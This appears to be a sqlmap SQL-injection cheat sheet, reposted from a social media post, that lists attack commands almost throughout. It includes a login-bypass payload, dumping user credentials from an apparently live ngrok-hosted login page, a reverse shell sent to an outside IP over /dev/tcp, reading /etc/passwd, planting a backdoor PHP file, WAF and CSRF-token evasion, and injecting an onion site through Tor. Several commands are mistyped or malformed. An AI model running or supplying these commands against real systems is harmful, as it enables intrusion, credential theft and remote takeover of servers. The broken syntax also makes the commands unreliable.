Fuzzing SQLi Login Bypass:
https://raw.githubusercontent.com/payloadbox/sql-injection-payload-list/master/Intruder/exploit/
Auth Bypass.txt
User: ' or 1=1 limit 1 -- -+ Pass: ' or 1=1 limit 1 -- -+
Perform a SQLI POST injection with sqlmap
We copy the HTTP/S request of the vulnerable login with Burp Suite
sqlmap -r sql.txt --random-agent --dbs
sqlmap -u 'https://d83c-38-43-159-183.sa.ngrok.io/sistema/ajax/usuario.php?op=verificar' --method POST -- data="logina=sadsadasadsa&clavea=asdsada" --dbms=mysql --dbs
List the affected database in the application.
sqlmap -u 'https://d83c-38-43-159-183.sa.ngrok.io/sistema/ajax/usuario.php?op=verificar' --method POST-- T-- data="logina-sadsadasadsa&clavea=asdsada". a" --dbms=mysql --current-db
List the user in the SQL
sqlmap -u 'https://d83c-38-43-159-183.sa.ngrok.io/sistema/ajax/usuario.php?op=verificar' --method POST -- data="logina=sadsadasadsa&clavea=asdsada" --dbms=mysql --users
List user passwords in MySQL
sqlmap -u 'https://d83c-38-43-159-183.sa.ngrok.io/sistema/ajax/usuario.php?op=verificar' --method POST-- data="logina-sadsadasadsa&clavea=asdsada" --dbms=mysql --password
List privileges with the server user in MySQL
sqlmap -u 'https://d83c-38-43-159-183.sa.ngrok.io/sistema/ajax/usuario.php?op=verificar' --method POST -- data="logina-sadsadasadsa&clavea=asdsada" --privileges
List the dbsystem database tables
sqlmap -u 'https://d83c-38-43-159-183.sa.ngrok.io/sistema/ajax/usuario.php?op=verificar' --method POST -- data="logina=sadsadasadsa&clavea=asdsada" -D dbsistema --tables
List columns of the user table of the dbsistema database
sqlmap -u 'https://d83c-38-43-159-183.sa.ngrok.io/sistema/ajax/usuario.php?op=verificar' --method POST -- data="logina-sadsadasadsa&clavea=asdsada" -D dbsistema -T usuario -columns
Dump the records of the columns charge, email, login, key of the user table of the dbsistema database
sqlmap -u 'https://d83c-38-43-159-183.sa.ngrok.io/sistema/ajax/usuario.php?op=verifica --method POST -- data="logina=sadsadasadsa&clavea=asdsada" -D dbsistema -T usuario -C cargo,email,login,clave -dump
Identify the database directly affected by the SQLi exploitation.
sqlmap -u 'http://127.0.0.1/xvwa/vulnerabilities/sqli/' --data='item=&search=7' -p 'search' -v 3 --current-db
Identify the user who connects to the instance directly affected by the SQLi exploitation.
sqlmap -u 'http://127.0.0.1/xvwa/vulnerabilities/sqli/' --data='item=&search=7' -p 'search' -v 3 --current-user
List the users in the database manager.
sqlmap -u 'http://127.0.0.1/xvwa/vulnerabilities/sqli/' --data='item=&search=7' -p 'search' -v 3 --users
List user privileges on the database manager.
sqlmap -u 'http://127.0.0.1/xvwa/vulnerabilities/sqli/' --data='item=&search=7' -p 'search' -v 3 --privileges
Obtain a reverse shell (We must have write permission).
sqlmap -u 'http://127.0.0.1/xvwa/vulnerabilities/sqli/' --data='item=&search=7' -p 'search' -v 3 --os-shell
Execute operating system commands from SQL.
sqlmap -u 'http://127.0.0.1/xvwa/vulnerabilities/sqli/' --data='item=&search=7' -p 'search' -v 3 --os-cmd 'bash -c 'exec bash -i &>/dev/tcp/172.16.40.5/443 <&1"
Read OS files (We must have Read permission).
sqlmap -u 'http://127.0.0.1/xvwa/vulnerabilities/sqli/' --data='item=&search=7' -p 'search' -v 3 --file-read='/etc/passwd'
cat /root/.local/share/sqlmap/output/192.168.100.6/files/_etc_passwd
Uploading files on the operating system vulnerable to SQLi. (We must have write permission).
sqlmap -u 'http://127.0.0.1/xvwa/vulnerabilities/sqli/' --data='item=&search=7' -p 'search' -v 3 --file-write='/root/backdor.php' --file-dest='/var/www/html/xvwa/config1.php'
Injection with prefix identification.
sqlmap -u 'http://104.248.172.152:32587/case6.php?col-id' --dbms="mysql" --level-3 --risk-2 --code=200 --prefix="--no-cast
sqlmap -u 'http://104.248.172.152:32587/case6.php?col=id' --dbms="mysql" --level=3 --risk=2 --code=200 --prefix="" --no-cast --time-sec-2 -D testdb -T flag6 -C Content --dump
Injection with union identification
sqlmap -u 'http://167.172.52.160:32714/case7.php?id=1'--level-3 --risk-3 --no-cast --union-char='1' --dbms="mysql" --random-agent --technique-U -union-cols=1-20
sqlmap -u 'http://167.172.52.160:32714/case7.php?id=1'--level=3 --risk-3 --no-cast --union-char='1' --dbms="mysql" --random-agent --technique-U --union-cols=1-20 -D testdb -T flag7 -C Content -dump
Anti-CSRF Token Bypass Injection
sqlmap -u 'http://167.172.52.160:31918/case8.php' --data="id=1&token=uwDFtZygjfiRWmWzY0tc4IQV3a4P1q6G97E0xXS8uw" --csrf-token="token" --random-agent --skip-waf
sqlmap -u 'http://167.172.52.160:31918/case8.php' --data="id=1&token=uwDFtZygjfiRWmWzY0tc4IQV3a4P1q6G97E0xXS8uw" --csrf-token="token" --cookie="PHPSESSID=enos23dmkupup8hhfghm2hpgso" --random-agent -D testdb -T flag8 -C Content --dump
Single Value Bypass Injection
sqlmap -u 'http://167.172.52.160:31918/case9.php?id=1&uid=1599283944' --randomize-uid --batch -v 5 | grep URI
sqlmap -u 'http://167.172.52.160:31918/case9.php?id=1&uid=1599283944' --randomize=uid --batch -v 5 --random-agent --dbs
Injection Bypass Filtering of characters '<', '>'
sqlmap -u '167.172.52.160:31918/case11.php?id=1' --tamper-between --level-3 --risk-3 --no-cast --dbms=mysql-dbs
sqlmap 'http://178.128.42.126:30292/action.php' -X POST-H 'User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0' -H 'Accept: */*' -H 'Accept-Language: en-US,en;q=0.5' -H 'Accept- Encoding: gzip, deflate' -H 'Content-Type: application/json' -H 'Origin: http://178.128.42.126:30292' -H 'Connection: keep-alive' -H 'Referer: http://178.128.42.126:30292/shop.html' -H 'Cookie: sort=0a' --data-raw {"id":1}' -dbms="mysql" --level=3 --risk-2 --no-cast --tamper-between --time-sec-2 -D production -T final_flag -C content --dump
WAF Evasion
View installed scripts ls /usr/share/sqlmap/tamper
sqlmap -u'http://127.0.0.1/xvwa/vulnerabilities/sqli/" --data='item=&search=7' -p 'search' --random-agent --timeout=3 -v 1 --threads=10 --dbms=mysql --level-5 --risk-3 -v 3 --no-cast --dbs - tamper='htmlencode'
Search by columns
sqlmap -u 'https://www.tuwebsito.com/?search=aea' --random-agent --timeout=3 -v 1 --threads=10 --dbms=mysql --level-5 --risk-3 -v 3 --hex -C nombre -search
Extract data from columns by number of records
sqlmap -u 'https://www.tuwebsito.com/?search=aea' --level-2 --risk-1 --no-cast -p 'continente' --string="KM" --dbms="Oracle" --time-sec-1 --tamper="between,charencode" --random-agent -D IDODB -T ACT_VERIFICACION --pivot-column=PRE_NOMBRES -C PRE_NOMBRES_E --start=1 --stop-10 --dump
Identify parameters through crawling
sqlmap -u http://testphp.vulnweb.com/ --crawl-10 --level-1 --risk-1 --answers="do you want to test this URL=Y" --answers="Do you want to skip further tests involving it? =N" --threads 10-batch sqlmap -u http://testphp.vulnweb.com/ --forms --batch --crawl-10--level-2 --risk-1 -- cookie="PHPSESSID=enos23dmkupup8hhfghm2hpgso" --random-agent
sqlmap -u http://testphp.vulnweb.com/ --forms --batch --crawl-10 --level-2 --risk-1 --dbms=mysql -- answers "already=N"
sqlmap -u http://testphp.vulnweb.com/ --forms --batch --crawl-10 --level=2 --risk-1 --dbms=mysql -- answers "follow=Y"
Identify parameters of multiple endpoints (urls)
sqlmap -m urls.txt --batch --level-3 --risk-2 --dbms=mysql --answers "already=N"
sqlmap -m sql.txt --batch --level-3 --risk-2 --dbms=mysql --answers "already=N" --method POST-- data="id=1" --cookie="PHPSESSID=msk54snle4a8dfca774mhrih13" --dbs
Pentesting Target Onion InjectionSQLi
sudo apt install tor && sudo apt install proxychains
netstat -apn | grep "tor" / 127.0.0.1:9150
proxychains4 nmap -sT -PN -n -p- 2uw3iwonlklvl5bftdqwebg7n4v62yq3nrpbczry2flmpghpajc45xqd.onion
sqlmap -r web.txt --dbms='mysql' --random-agent --tor --check-tor --tor-port=9150 --tor-type=SOCKS5 --level 2-risk 2-dbs
source: https://www.facebook.com/plugins/post.php?href=https%3A%2F%2Fwww.facebook.com%2Fpermalink.php%3Fstory_fbid%3Dpfbid0TcGonUD2GEjFeHJkCizW3XPcW6V1saJKbnpFv4n3EgtzD9GQ7PH6j9iHv5TDDrtvl%26id%3D100094147517045